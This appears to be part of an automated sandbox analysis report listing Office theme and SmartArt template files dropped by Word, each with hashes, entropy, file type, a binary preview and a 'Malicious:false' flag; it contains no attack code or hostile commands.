                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1091485
                                                                                    Entropy (8bit):7.906659368807194
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                    MD5:2192871A20313BEC581B277E405C6322
                                                                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                    Malicious:false
                                                                                    Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):608122
                                                                                    Entropy (8bit):7.729143855239127
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                    Malicious:false
                                                                                    Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5783
                                                                                    Entropy (8bit):7.88616857639663
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                    Malicious:false
                                                                                    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4026
                                                                                    Entropy (8bit):7.809492693601857
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                    Malicious:false
                                                                                    Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4243
                                                                                    Entropy (8bit):7.824383764848892
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                    Malicious:false
                                                                                    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):16806
                                                                                    Entropy (8bit):7.9519793977093505
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):11380
                                                                                    Entropy (8bit):7.891971054886943
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):6024
                                                                                    Entropy (8bit):7.886254023824049
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):9191
                                                                                    Entropy (8bit):7.93263830735235
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                    Malicious:false
                                                                                    Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4326
                                                                                    Entropy (8bit):7.821066198539098
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                    Malicious:false
                                                                                    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):7370
                                                                                    Entropy (8bit):7.9204386289679745
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                    Malicious:false
                                                                                    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):5596
                                                                                    Entropy (8bit):7.875182123405584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                    MD5:CDC1493350011DB9892100E94D5592FE
                                                                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):3683
                                                                                    Entropy (8bit):7.772039166640107
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
